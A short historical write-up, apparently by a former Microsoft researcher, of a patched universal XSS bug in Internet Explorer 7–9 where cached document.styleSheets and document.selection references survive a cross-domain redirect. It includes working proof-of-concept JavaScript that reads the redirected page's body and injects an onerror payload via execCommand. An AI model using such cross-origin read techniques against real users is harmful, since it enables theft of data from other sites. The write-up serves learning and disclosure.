UXSS: Cached document.styleSheets and document.selection Survive Redirect

This UXSS relied on the fact that certain live collections returned by the DOM — specifically document.styleSheets and document.selection — remain valid and readable after the window they came from has navigated to a different domain. Saving one of these collection references before a redirect and then accessing it after the redirect completed gave full read access to the target document.

<script language="JavaScript">
var win, xselection, xstyleSheets;

function f_xstyleSheets()
{
    win = window.open("redirect.aspx","","width=200,height=200");
    xstyleSheets = win.document.styleSheets;
    setTimeout("alert(xstyleSheets[0].owningElement.ownerDocument.body.innerText);",2000);
}

function f_xselection()
{
    win = window.open("redirect.aspx","","width=200,height=200");
    xselection = win.document.selection;
    setTimeout("insertImage()",2000);
}

function insertImage()
{
    var range = xselection.createRange();
    range.execCommand("InsertImage", null, '1" onerror="if (!window.hasRun) { window.hasRun = true; alert(document.body.innerText)}');
}
</script>
<input type="button" onclick="f_xstyleSheets()" value="xDom using document.styleSheets">
<input type="button" onclick="f_xselection()" value="xDom document.selection">

The styleSheets path is the simpler one: after the redirect the cached collection still references the new document’s style sheets, and owningElement.ownerDocument gives direct access to the new document’s body. The selection path is more indirect — it uses createRange().execCommand("InsertImage") with a crafted URL containing an onerror handler, which fires in the redirected document’s context. Both techniques were confirmed on Vista IE7 and Windows 7 IE8/IE9.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.